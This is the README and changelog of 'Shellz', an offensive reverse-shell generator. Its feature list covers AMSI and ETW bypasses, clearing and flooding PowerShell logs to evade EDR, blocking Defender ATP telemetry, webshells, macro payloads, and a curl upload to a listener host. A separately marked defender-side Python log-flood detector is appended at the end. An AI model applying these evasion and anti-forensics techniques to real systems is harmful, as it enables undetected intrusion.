A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA to get correctly formatted.
- Shows username@computer.(domain), above the prompt and working-directory
- Has a partial and full AMSI-bypass.
- TCP, UDP and SSL shells
- New custom TCP revshell!
- New custom SSL revshell!
- Reflective loading of theart42's amazing Sharpcat!
- Windows Powershell and Core Powershell
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- No PowerShell? No problem! Load embedded Python. The embedded Python files are signed and trusted by Microsoft Intelligent Security Graph.
- ngrok can be started/stopped from inside the script
- Payloads will be generated with the ngrok addresses
- You can start/stop Updog from inside the script
- The PowerShell revshells have upload/download function embedded
- To upload from nix using curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
pacman -S shellz
netcat, rlwrap, jq, basenc (coreutils)
updog, ngrok, xclip
- Added Windows Terminal Init option in the PowerShell section
- Added option under Python, for using Python Embedded in a VBA Macro
- Added option under PowerShell for staged loading of a Constrained Language Mode bypass using msbuild.exe
- Changed payload for Python Embedded. Not saving script to disk anymore
- Obfuscated the Python revshell some
- Fixed typo in Python3 payload for Windows
- Added option for using Python Embedded to get a revshell on a Windows box not having Python installed and without using PowerShell.
- Added PS to prompt in SSL shell
- Shortened the full amsi bypass
- Removed "updog is not running" message when it first hasn't been activated
- Removed some more auto-enter selections in menus
- Fixed error in block MDE command
- Added init command options: cmd, conhost, powershell (If the payload is over 8191 characters, it has to be initiated from powershell directly)
- Filling "Microsoft-Windows-PowerShell/Operational" with even more entries, to be sure to push out the script's initial execution. (Only works if scriptblock logging is enabled on target)
- Had only URL-safe Base64 encoding. Added ordinary Base64 encoding of payloads.
- Added option for filling the PowerShell log. It starts a bunch of PowerShell sessions, each passing a long string and exiting. When scriptblock logging is enabled this fills the log, effectively pushing out earlier log entries and thus removing the event of the shell itself spawning. Could prevent EDR detection. Tested with success on SentinelOne.
- Fixed confusing menu selections. Removed auto-enter on selecting options on most menus.
- Added Metasploit Multi/handler Listener
- Added Powershell ETW-patch
- Added Powershell embedded full AMSI-bypass.
- Added payload length check. The maximum length of the string that you can use at the Windows command prompt (cmd.exe) is 8191 characters.
- Fixed Powershell SSL-shell
- Added variable expansion on the powershell payload, making it run from e.g. batch-files without modifying it
- Renaming to Shellz
- Listener started in new window. (Optional on Linux)
- Powershell: Added option for reflective loading Sharpcat
- PowerShell: New custom SSL shell
- PowerShell: Added options for choosing TCP/UDP/SSL
- PowerShell/OpenSSL: Defaulting to correct listener when using SSL
- Updated installer to use wrapper-script (remember to delete /usr/local/bin/shells when upgrading from < 1.5.8)
- PowerShell: Built a unique TCP revshell that does not use Net.Sockets.TCPClient
- PowerShell: Remote error messages are now properly displayed
- PHP: added options and more payloads
- Added option on other payloads for changing shell
- Powershell: Fixed the NIX payload
- Powershell: Updated the payload for reflective loading C#
- Powershell: Added options for payload in menu.
- PowerShell: Changed revshell for bypassing more AV vendors
- Powershell: Added firewall-rule, preventing MS ATP from phoning home (if the running user has access)
- Powershell: Updated VBA (MS Office Macros)
- PowerShell: Disabling scriptblock logging and CheckSuspiciousContent
- PowerShell: Clears PowerShell eventlogs (if the running user has access)
- PowerShell: Added VBA payloads for MS Office Macros
- Added some node.js payloads
- Added a simple C# shell.
- Added payload for reflective loading the C# shell into memory. (Needs full AMSI bypass)
- Covering this by adding Rastamouse's full AMSI Bypass
- PowerShell: You can automatically upload and run the full AMSI bypass. The partial AMSI bypass makes this possible.
- C# Shell: Automatically upload and run full AMSI bypass before loading it into memory
- Updog and ngrok status showing in every menu
- Sometimes less is more. Removed the obfuscating on TCP/UDP PowerShell revshells, because it actually triggers AV more than it bypasses and the payload got really big :-) Still using randomization.
- Added webshells (ASPX, PHP, JSP)
- Added 2 c++ revshell binaries for Windows 32 and 64 bit.
- Fixed the handling of starting/stopping Updog
- Added Updog support
- Added Netcat binaries.
- Powershell: Created upload/download functionality (upload requires Updog for receiving files)
- Added more information about running ngrok and Updog.
- PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graeber's Reflection method
- PowerShell: Added an "upload" function in the PowerShell reverse shell
- Removed AMSI. Not tested enough :-)
- Added AMSI-bypass for the powershell payloads
- Fixed bug when setting port
- Changed default port to 443
- PowerShell: obfuscated some more
- PowerShell: Minor changes to the UDP payload
- Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
- PowerShell: Added UDP payloads
- PowerShell: Added more payloads
- PowerShell: Added some randomization and obfuscation for the payload
- PowerShell: Using UTF8 encoding in payload
- Added Golang
- Added OpenSSL
- Fixed bug in Python revshell
- Added awk
- Added Bash UDP
- Added Windows Python revshells
- Added a ngrok running-status
- Hiding ngrok choice if not installed
- Fixed the install options: the default option is no longer selected when pressing Enter without making a choice
- Added support for ngrok.
- Added an install script
- Added install options for checking and installing missing dependencies
- Added a couple of PHP shells
- Added shells for: Ruby, Perl, Telnet and zsh
- Added copy to clipboard using pbcopy on macOS
- Added info about listening netcat, as the macOS version doesn't display that
- Added looping netcat shells. Calls back every 10 seconds. Great in case you lose your shell
- Added check for GNU netcat 0.7.0 from Homebrew when running on macOS
- Added support for macOS
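The log-filling entries above describe pushing the shell's own script-block event out of "Microsoft-Windows-PowerShell/Operational" by spawning many short sessions that each log one long string. The following is an added, defender-side example that is not part of the Shellz project: it flags that pattern in a constructed batch of Event ID 4104 (script block logging) records, assumed to be already extracted to (timestamp, process id, script block text) tuples, where the thresholds are assumptions to tune per environment.

```python
"""Flag a script-block log flood: many large, near-identical 4104 events from many processes."""
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample records (timestamp, pid, ScriptBlockText). The first record is the
# kind of earlier entry a flood would try to push out of the log; the 30 that follow
# mimic many short sessions that each log one long string and exit.
SAMPLE_EVENTS = [
    ("2024-01-01T12:00:00", 4100, "Write-Host 'earlier entry'"),
] + [
    ("2024-01-01T12:00:%02d" % s, 5000 + s, "A" * 4000) for s in range(1, 31)
]


def detect_log_flood(events, window=timedelta(seconds=60), min_events=20,
                     min_len=1000, min_pids=10, same_ratio=0.9):
    """Return findings for bursts of large script blocks inside `window` that come
    from at least `min_pids` distinct processes and are mostly the same text.
    A single long legitimate script logged once does not trip this; a flood
    of repeated long strings from many fresh processes does."""
    parsed = sorted((datetime.fromisoformat(ts), pid, text) for ts, pid, text in events)
    findings = []
    for i, (start, _, _) in enumerate(parsed):
        burst = [e for e in parsed[i:]
                 if e[0] - start <= window and len(e[2]) >= min_len]
        if len(burst) < min_events:
            continue
        pids = {pid for _, pid, _ in burst}
        top_text, top_count = Counter(t for _, _, t in burst).most_common(1)[0]
        if len(pids) >= min_pids and top_count / len(burst) >= same_ratio:
            findings.append({
                "start": burst[0][0].isoformat(),
                "events": len(burst),
                "processes": len(pids),
                "repeated_block_len": len(top_text),
            })
            break  # one finding per burst is enough here
    return findings


if __name__ == "__main__":
    for finding in detect_log_flood(SAMPLE_EVENTS):
        print("possible script-block log flood:", finding)
```

Because scriptblock logging is the only thing that makes this technique work, the detection belongs where those events are collected (a SIEM or forwarder), not on the endpoint log that is being overwritten.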